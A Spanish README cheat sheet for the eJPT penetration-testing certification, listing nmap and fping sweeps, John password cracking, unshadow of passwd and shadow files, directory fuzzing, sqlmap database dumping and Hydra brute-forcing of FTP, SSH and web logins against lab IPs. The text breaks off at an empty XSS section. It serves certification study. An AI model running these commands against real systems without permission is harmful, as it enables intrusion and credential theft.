└── README.md /README.md: -------------------------------------------------------------------------------- 1 | # eJPT-Cheatsheet 2 | Todos los comandos necesarios para aprobar el eJPT 3 | 4 | Recursos que te pueden interesar: 5 | - [eJPT - Review](https://hacknotes.github.io/certificaciones/eJPTReview/) 6 | - [Aprobar el eJPT a la primera](https://hacknotes.github.io/certificaciones/eJPTAprove/) 7 | # Barrido de ping - Ping sweep 8 | ## Nmap 9 | ```sql 10 | nmap -sn 10.10.10.0/24 11 | ``` 12 | ## fping 13 | ```sql 14 | fping -a -g 10.10.10.0/24 2>/dev/null 15 | ``` 16 | # Password cracking 17 | ## John 18 | ```python 19 | john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt 20 | ``` 21 | ## Online Tools 22 | [CrackStation](https://crackstation.net/) 23 | # Dump Hashes 24 | ## unshadow 25 | ```sql 26 | unshadow passwd shadow > hashes.txt 27 | ``` 28 | # Fuzzing 29 | ## Nmap 30 | ```python 31 | nmap --script=http-enum -p80 10.10.14.16 -oN webScan 32 | ``` 33 | ## wfuzz 34 | ```python 35 | wfuzz -c --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.14.15/FUZZ 36 | wfuzz -c --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.14.15/FUZZ.php 37 | ``` 38 | ## dirb 39 | ```sql 40 | dirb http://10.10.15.12 41 | ``` 42 | ## gobuster 43 | ```sql 44 | gobuster dir -u 10.10.14.12 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html 45 | ``` 46 | # SQLMap 47 | ```sql 48 | sqlmap -u "http://10.10.14.12/file.php?id=1" -p id 49 | sqlmap -u "http://10.10.14.12/file.php?id=1" -p id --dbs 50 | sqlmap -u "http://10.10.14.12/file.php?id=1" -p id -D dbname --tables 51 | sqlmap -u "http://10.10.14.12/file.php?id=1" -p id -D dbname -T table_name --dump 52 | ``` 53 | # Hydra 54 | ```sql 55 | hydra -v -l admin -P passlist.txt ftp://192.168.0.1 56 | hydra -v -L userlist.txt -P passlist.txt ftp://192.168.0.1 57 | hydra -v -l root -P passwords.txt -t 1 -u 10.10.14.10 ssh 58 | hydra http://10.10.14.10/ http-post-form "/login.php:user=^USER^&password=^PASS^:Incorrect" -L userlist.txt -P passwordslist.txt 59 | ``` 60 | # XSS 61 | ```sql 62 | 63 |